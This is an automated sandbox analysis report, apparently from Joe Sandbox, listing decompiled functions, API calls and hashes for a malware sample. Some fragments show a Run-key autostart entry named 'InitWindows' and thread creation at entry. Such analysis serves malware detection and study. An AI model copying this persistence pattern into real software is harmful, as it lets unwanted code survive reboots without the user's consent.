                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick
                                      • String ID:
                                      • API String ID: 2804873075-0
                                      • Opcode ID: acb7a90d3ef2e1a131849970500f517b5b2d52757649e3029d83940a14e75b4e
                                      • Instruction ID: ddb7d964e0af27d95870ddca47c803c6e7176c81a9b6f5d8f871fb0fc9213b45
                                      • Opcode Fuzzy Hash: acb7a90d3ef2e1a131849970500f517b5b2d52757649e3029d83940a14e75b4e
                                      • Instruction Fuzzy Hash: 6FD0A9303481048BE30C9A09FC4E2613A4EC7C2301F00C06BF20EC90A2C9E155944490
                                      Uniqueness

                                      Uniqueness Score: 1.69%

                                      C-Code - Quality: 100%
                                      			E0025E221(void** __ecx) {
                                      				int _t2;
                                      				void** _t4;
                                      
                                      				_t4 = __ecx;
                                      				ReleaseMutex( *__ecx);
                                      				_t2 = CloseHandle( *_t4); // executed
                                      				return _t2;
                                      			}
                                      0x0025e222
                                      0x0025e226
                                      0x0025e22e
                                      0x0025e235

                                      APIs
                                      • ReleaseMutex.KERNEL32(?,?,0025DE9B,?,00255774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0025E226
                                      • CloseHandle.KERNEL32(?), ref: 0025E22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 4207627910-0
                                      • Opcode ID: 891bcadff337102fe9d5ff7364a12914b2a5b25554b3a250363f0a12f969fd45
                                      • Instruction ID: dfb55b8c847d532c88b76b552d4f69e636dd9d575649d55593ca67586854e6ef
                                      • Opcode Fuzzy Hash: 891bcadff337102fe9d5ff7364a12914b2a5b25554b3a250363f0a12f969fd45
                                      • Instruction Fuzzy Hash: 03B0923A004420DFEB212F94FC0C8957BA9FF0935131944AAF581911388BE20C159B80
                                      Uniqueness

                                      Uniqueness Score: 23.02%

                                      C-Code - Quality: 100%
                                      			E00255A87(long __ecx) {
                                      				void* _t2;
                                      
                                      				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}
                                      0x00255a91
                                      0x00255a97

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A8A
                                      • RtlAllocateHeap.NTDLL(00000000,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000,?,?,00000000), ref: 00255A91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 19b72a1b6c24bbd861ee024fd7ce42e922844c3f79f45766a117eb9681d1833c
                                      • Instruction ID: 0fed0d0557ee86599e41c885d70bc70679795aa868de7f57f4f30e3b6a01d2bf
                                      • Opcode Fuzzy Hash: 19b72a1b6c24bbd861ee024fd7ce42e922844c3f79f45766a117eb9681d1833c
                                      • Instruction Fuzzy Hash: C9A002B5558500DFDD4457A4BD0DB153528A746703F109584F3098509195E554049631
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      C-Code - Quality: 100%
                                      			E00255A76(void* __ecx) {
                                      				int _t2;
                                      
                                      				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}
                                      0x00255a80
                                      0x00255a86

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00255A61,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A79
                                      • HeapFree.KERNEL32(00000000,?,0025E39B), ref: 00255A80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 70424dc4e0bb1262f46fa7f6552ffb1a7697d3e9ba2b07af57a3dd738db77764
                                      • Instruction ID: 2ab9734bb39b677a20877fe824a2534587673827de85fd01e400790a5b6fb653
                                      • Opcode Fuzzy Hash: 70424dc4e0bb1262f46fa7f6552ffb1a7697d3e9ba2b07af57a3dd738db77764
                                      • Instruction Fuzzy Hash: 06A002B1558510DFDD4457A5BD0EB1535289746707F008584F30D8509195F454048631
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      APIs
                                        • Part of subcall function 012E622D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012E7957,00000001,00000364,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E626E
                                      • _free.LIBCMT ref: 012E94D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction ID: f219e77f1b5bb3de68eed4c5c671d28fde18a444570f73dbd39b24ab971c70c0
                                      • Opcode Fuzzy Hash: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction Fuzzy Hash: DA014E722103065BE7318F59D8459AAFBDCFBD5234F65051DE284432C0EA706845C774
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 87%
                                      			E00260A57(void* __ecx) {
                                      				void* _t22;
                                      				intOrPtr* _t32;
                                      				intOrPtr* _t33;
                                      				intOrPtr* _t34;
                                      				intOrPtr* _t37;
                                      				void* _t42;
                                      
                                      				_t42 = __ecx;
                                      				_t1 = _t42 + 0x34; // 0x0
                                      				_t32 =  *_t1;
                                      				if(_t32 != 0) {
                                      					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
                                      				}
                                      				_t3 = _t42 + 0x34; // 0x0
                                      				_t33 =  *_t3;
                                      				if(_t33 != 0) {
                                      					 *((intOrPtr*)( *_t33 + 8))(_t33);
                                      					 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                      				}
                                      				_t6 = _t42 + 0x18; // 0x0
                                      				_t34 =  *_t6;
                                      				if(_t34 != 0) {
                                      					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                      					 *((intOrPtr*)(_t42 + 0x18)) = 0;
                                      				}
                                      				_t9 = _t42 + 0x1c; // 0x3c0a74
                                      				E002523FE(_t9);
                                      				_t10 = _t42 + 0x20; // 0x3c0a78
                                      				E002523FE(_t10);
                                      				_t11 = _t42 + 0x24; // 0x0
                                      				_t37 =  *_t11;
                                      				if(_t37 != 0) {
                                      					 *((intOrPtr*)( *_t37 + 8))(_t37);
                                      					 *((intOrPtr*)(_t42 + 0x24)) = 0;
                                      				}
                                      				_t14 = _t42 + 0x28; // 0x3c0a80
                                      				E002523FE(_t14);
                                      				_t15 = _t42 + 0x2c; // 0x3c0a84
                                      				E002523FE(_t15);
                                      				_t16 = _t42 + 0x30; // 0x3c0a88
                                      				_t22 = E002523FE(_t16);
                                      				 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                      				__imp__CoUninitialize(); // executed
                                      				return _t22;
                                      			}
                                      0x00260a58
                                      0x00260a5b
                                      0x00260a5b
                                      0x00260a60
                                      0x00260a65
                                      0x00260a65
                                      0x00260a68
                                      0x00260a68
                                      0x00260a6f
                                      0x00260a74
                                      0x00260a77
                                      0x00260a77
                                      0x00260a7a
                                      0x00260a7a
                                      0x00260a7f
                                      0x00260a84
                                      0x00260a87
                                      0x00260a87
                                      0x00260a8a
                                      0x00260a8d
                                      0x00260a92
                                      0x00260a95
                                      0x00260a9a
                                      0x00260a9a
                                      0x00260a9f
                                      0x00260aa4
                                      0x00260aa7
                                      0x00260aa7
                                      0x00260aaa
                                      0x00260aad
                                      0x00260ab2
                                      0x00260ab5
                                      0x00260aba
                                      0x00260abd
                                      0x00260ac2
                                      0x00260ac5
                                      0x00260acd

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Uninitialize
                                      • String ID:
                                      • API String ID: 3861434553-0
                                      • Opcode ID: 8b249313bfc37054162e5c1a9121bdfeb17c0fac0c7fd1c4f0b8b65b97a13331
                                      • Instruction ID: d05f58f32a8989d9b8cad225667bca61943b5a62c6e9289af94f2c968b7470d1
                                      • Opcode Fuzzy Hash: 8b249313bfc37054162e5c1a9121bdfeb17c0fac0c7fd1c4f0b8b65b97a13331
                                      • Instruction Fuzzy Hash: 1501E5752227009FC338DF25D5A486BB7E4EF597013405A6DE48787AA1CB39F859DF00
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012E7957,00000001,00000364,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E626E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 2792853946f7cde7166a60161a6d3a851b268eb431f9f9e60d333b5b8bd7fc10
                                      • Instruction ID: 3b266b1250fa786fe1596b3c455b6e76c31b20ec7ecac400eaba581b7c6fde0f
                                      • Opcode Fuzzy Hash: 2792853946f7cde7166a60161a6d3a851b268eb431f9f9e60d333b5b8bd7fc10
                                      • Instruction Fuzzy Hash: 0FF0B43167412267EF325A69980DB6B3BDDAB71670F848115EF05EA180DA60E80087A1
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 79%
                                      			E0025EF0C(void** __ecx, short** _a8) {
                                      				int _v8;
                                      				signed int _t8;
                                      
                                      				_push(__ecx);
                                      				_v8 = 0;
                                      				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
                                      				if(_t8 != 0) {
                                      					return 0;
                                      				}
                                      				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
                                      			}
                                      0x0025ef0f
                                      0x0025ef24
                                      0x0025ef2c
                                      0x0025ef35
                                      0x00000000
                                      0x0025ef41
                                      0x00000000

                                      APIs
                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0025F0F4,?,?), ref: 0025EF2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 05c0dfdf8e30ee0c1618e8664227c03b3af638eea91497535874d02ae6d4f466
                                      • Instruction ID: 60dace52d59162b5eaebde53e449677411e0292a50b01bb4ad927d2f6aad6bf5
                                      • Opcode Fuzzy Hash: 05c0dfdf8e30ee0c1618e8664227c03b3af638eea91497535874d02ae6d4f466
                                      • Instruction Fuzzy Hash: 4FE0DF32522229FFDF248B528D08ECB7E6DEF05BE4F108044F90AA2080C2B18B04D6F0
                                      Uniqueness

                                      Uniqueness Score: 0.16%

                                      C-Code - Quality: 58%
                                      			E0025D75B(WCHAR** __ecx, void* __edx, void* __eflags) {
                                      				char _v524;
                                      				WCHAR** _t13;
                                      				void* _t14;
                                      
                                      				_t14 = __edx;
                                      				_t13 = __ecx;
                                      				E00251052( &_v524, 0, 0x208);
                                      				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
                                      				E00253412(_t13,  &_v524); // executed
                                      				return _t13;
                                      			}
                                      0x0025d774
                                      0x0025d776
                                      0x0025d778
                                      0x0025d78c
                                      0x0025d79b
                                      0x0025d7a5

                                      APIs
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$FolderPathSpeciallstrcpy
                                      • String ID:
                                      • API String ID: 1680175942-0
                                      • Opcode ID: b5f5778e0828e54985d1a56d1cf5941d59d3782ec3bb1214896f92fa662308c0
                                      • Instruction ID: 91797d20999aaca9013a476da3681ed92ff746b315b40f17523b94b30eb8f1fd
                                      • Opcode Fuzzy Hash: b5f5778e0828e54985d1a56d1cf5941d59d3782ec3bb1214896f92fa662308c0
                                      • Instruction Fuzzy Hash: D3E0927570031867DB60A6159C0EF87776C8BC0711F000171BA58E21C1E9B09A598AA0
                                      Uniqueness

                                      Uniqueness Score: 0.51%

                                      C-Code - Quality: 87%
                                      			E0025D425(signed int* __ecx) {
                                      				char _v8;
                                      				WCHAR* _t3;
                                      				void* _t5;
                                      				signed int* _t15;
                                      
                                      				_push(__ecx);
                                      				_t15 = __ecx;
                                      				_t3 = E00255ADB(0x7d0);
                                      				 *__ecx =  *__ecx & 0x00000000;
                                      				_t18 = _t3;
                                      				GetModuleFileNameW(0, _t3, 0x3e8);
                                      				_t5 = E00253412( &_v8, _t18); // executed
                                      				E00253264(_t15, _t5); // executed
                                      				E00255A2D(_v8);
                                      				return _t15;
                                      			}
                                      0x0025d428
                                      0x0025d42b
                                      0x0025d432
                                      0x0025d437
                                      0x0025d43a
                                      0x0025d444
                                      0x0025d44e
                                      0x0025d456
                                      0x0025d45e
                                      0x0025d468

                                      APIs
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0025F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0025D444
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
                                      • String ID:
                                      • API String ID: 1499825812-0
                                      • Opcode ID: b2e5cb7714318475df7bb050d58939956f4b7da310133145c4c95f5e42dce553
                                      • Instruction ID: 9d795b3aaf021ff0f47034b83c73fa63da6eb3258a3b4c466d5fd69da9ea76ce
                                      • Opcode Fuzzy Hash: b2e5cb7714318475df7bb050d58939956f4b7da310133145c4c95f5e42dce553
                                      • Instruction Fuzzy Hash: A4E0DF72714110A7D704B359EC57BAE766DCFC13A3F100025FA0AE21C2DEB05E188AA4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E00253001(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                      				short _v1028;
                                      				WCHAR** _t14;
                                      				WCHAR** _t15;
                                      
                                      				_t15 = __edx;
                                      				_t14 = __ecx;
                                      				E00251052( &_v1028, 0, 0x400);
                                      				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
                                      				E00253412(_t14,  &_v1028); // executed
                                      				return _t14;
			}

                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00253034
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                      • String ID:
                                      • API String ID: 1709970682-0
                                      • Opcode ID: e226500d08d56346db7393b660d0d09c66593b83293a03f81a1c5200475181cd
                                      • Instruction ID: 60ad3c6e23efc2ea63549a8281b7529fd9e057f466ee75fabaa31636796b5a4a
                                      • Opcode Fuzzy Hash: e226500d08d56346db7393b660d0d09c66593b83293a03f81a1c5200475181cd
                                      • Instruction Fuzzy Hash: 96E0D8B660011867DB20E6159C06F9677ACEBC0308F0500B5BB08F31C0E9B0DE1E8AA8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      C-Code - Quality: 100%
                                      			E00253162(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
                                      				void* _t4;
                                      				WCHAR* _t6;
                                      				WCHAR** _t8;
                                      				WCHAR** _t14;
                                      
                                      				_t14 = _a4;
                                      				_t8 = __ecx;
                                      				_t4 = E0025308E(_t14);
                                      				_t6 = E002559CE( *((intOrPtr*)(__ecx)), 4 + (_t4 + E0025308E(__ecx)) * 2); // executed
                                      				 *_t8 = _t6;
                                      				return lstrcatW(_t6,  *_t14);
			}

                                      APIs
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1475610065-0
                                      • Opcode ID: b65508ba825fbd4d08f17a83274e36a4546fea43c2db72e16ae0492c3e6ebeb6
                                      • Instruction ID: d8fdddb2bf7ce040596dbd25e508485b47bae7a0193e2cfca411c280700ae60f
                                      • Opcode Fuzzy Hash: b65508ba825fbd4d08f17a83274e36a4546fea43c2db72e16ae0492c3e6ebeb6
                                      • Instruction Fuzzy Hash: 03E026322003109BCB11AB66EC8886EBB9EEF853B1700003AFD05C7214EA715C24CAE4
                                      Uniqueness

                                      Uniqueness Score: 1.37%

                                      C-Code - Quality: 100%
                                      			E0025EFCB(void** __ecx, short** _a4, char** _a8, int _a12) {
                                      				long _t8;
                                      				void* _t13;
                                      
                                      				_t13 =  *__ecx;
                                      				if(_t13 == 0) {
                                      					L3:
                                      					return 0;
                                      				}
                                      				_t8 = RegSetValueExW(_t13,  *_a4, 0, _a12,  *_a8, _a8[1]); // executed
                                      				if(_t8 != 0) {
                                      					goto L3;
                                      				}
                                      				return _t8 + 1;
			}

                                      APIs
                                      • RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                      Yara matches
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 918af23dde86b9c18d35ee9ca00ca9adc37c3105e34c536a252b057a0c5f8e09
                                      • Instruction ID: 3b4c0a39776f8c9a407680f8d003d898de0db11c24a2bdd9b1892288c6aaf495
                                      • Opcode Fuzzy Hash: 918af23dde86b9c18d35ee9ca00ca9adc37c3105e34c536a252b057a0c5f8e09
                                      • Instruction Fuzzy Hash: ECE0DF32220125AFDB04CF84DC40EA6B7A8EF49740B158048FD11CB260D670ED20DB94
                                      Uniqueness

                                      Uniqueness Score: 0.20%

                                      C-Code - Quality: 100%
                                      			E0025DD40(intOrPtr* __ecx, intOrPtr _a4) {
                                      				intOrPtr* _t10;
                                      
                                      				_t10 = __ecx;
                                      				E00252F52(__ecx + 4, _a4); // executed
                                      				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
                                      				return 1;
			}

                                      APIs
                                        • Part of subcall function 00252F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,002533F1,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 00252F7E
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0025DD5B
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventlstrcat
                                      • String ID:
                                      • API String ID: 2275612694-0
                                      • Opcode ID: 3785c475ba6f5ab1030d9dfc545746098fb8fb2231c3a7e1a4dc380ab8f2be47
                                      • Instruction ID: dce08418dad520e612dda8a76bf848fb166020c02c4707a854310b3666b413c6
                                      • Opcode Fuzzy Hash: 3785c475ba6f5ab1030d9dfc545746098fb8fb2231c3a7e1a4dc380ab8f2be47
                                      • Instruction Fuzzy Hash: D6D05E32248205BBD710AB91EC06F86BF69FB62761F008026F65996590DBB1A839CB90
                                      Uniqueness

                                      Uniqueness Score: 1.31%

                                      C-Code - Quality: 100%
                                      			_entry_(char _a8) {
                                      
                                      				_t1 =  &_a8;
                                      				 *_t1 = _a8 - 1;
                                      				if( *_t1 == 0) {
                                      					CreateThread(0, 0, E0025586A, 0, 0, 0); // executed
                                      				}
                                      				return 1;
			}

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0025586A,00000000,00000000,00000000), ref: 00260E33
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: d3824833ca58249ae9a295fe4edcfc4f8ad7b3c46c34e3eaee0c3bae21a99edd
                                      • Instruction ID: c3b6d3e49cc02c17c1d5d2c3f6c60b87a61936399e9adb24d4708ba266183265
                                      • Opcode Fuzzy Hash: d3824833ca58249ae9a295fe4edcfc4f8ad7b3c46c34e3eaee0c3bae21a99edd
                                      • Instruction Fuzzy Hash: 0EC08CB1560228FEBB045BB22C0CC3773DCDB31212700C820FC01C2440D579CC688A30
                                      Uniqueness

                                      Uniqueness Score: 0.06%

                                      C-Code - Quality: 100%
                                      			E0025E236(void** __ecx) {
                                      				void* _t5;
                                      				void** _t10;
                                      
                                      				_t10 = __ecx;
                                      				_t5 = CreateMutexA(0, 0, 0); // executed
                                      				 *_t10 = _t5;
                                      				_t10[1] = 0 | _t5 != 0xffffffff;
                                      				return _t10;
			}

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0025DE7C,?,?,0025E3F7,?,?,00000000,002555C4,?,?,00000000), ref: 0025E23E
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: f283009218e93767c700cb456f65d4719c06e35c9bd0e2775c2357e8537ac8ad
                                      • Instruction ID: e17c9865a47832bcd4984c63c0c3f08638e6e3d28c62249c0a0e7875285d2b84
                                      • Opcode Fuzzy Hash: f283009218e93767c700cb456f65d4719c06e35c9bd0e2775c2357e8537ac8ad
                                      • Instruction Fuzzy Hash: 69D012B15045205FE3249F395C08967B5DDDF99720315CE29B4A9C71D4E5708C448760
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 75%
                                      			E0025510D(void** __ecx, void* __eflags) {
                                      				int _t7;
                                      				void* _t12;
                                      				void* _t13;
                                      
                                      				__imp__#116(_t13); // executed
